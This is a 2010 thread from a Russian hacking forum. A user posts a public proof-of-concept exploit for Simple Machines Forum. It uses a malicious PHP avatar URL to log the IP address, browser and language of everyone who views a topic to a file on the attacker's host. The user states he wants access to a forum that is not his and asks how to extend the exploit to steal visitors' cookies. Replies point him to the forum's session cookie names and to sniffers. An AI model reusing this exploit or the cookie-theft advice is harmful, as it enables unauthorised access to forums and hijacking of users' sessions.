Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Получить куки на SMF 1.1.18 (https://forum.antichat.xyz/showthread.php?t=197806)

br1tva 20.04.2010 19:34
Получить куки на SMF 1.1.18
 
Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

- Step by Step:

1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.

- [victims] All the people that visit the topic will be infect.


malicious file example [steal info]: (poc.php)


PHP код:
<?php   $ip $_SERVER['REMOTE_ADDR'];   $so$_SERVER['HTTP_USER_AGENT'];   $lan$_SERVER['HTTP_ACCEPT_LANGUAGE'];   $url$_SERVER['PHP_SELF'];   $path$_SERVER['DOCUMENT_ROOT'];   $archivo 'hacks.txt';   $fp fopen($archivo"a");   $string "   Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC       $path$url     VICTIM: $ip     info: $so   language: $lan       ";   $write fputs($fp$string);   fclose($fp);   ?>
Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???

br1tva 20.04.2010 19:49
уп )) стил нид хелп .

Godfather Bulan 20.04.2010 20:09
ну так посмотри переменную PHPSESSID например или как там в SMF

Chubakur 20.04.2010 21:34
SMFCookie и PHPSESSID посмотри.

br1tva 20.04.2010 21:38
Вплане SMFCookie и PHPSESSID посмотри ?? Можно немного поподробней ?? Я с куками 1 раз дело имею !!

br1tva 21.04.2010 01:08
Народ , помогите нубику ))

Godfather Bulan 21.04.2010 01:16
ну посмотри в сторону снифаков


Время: 16:05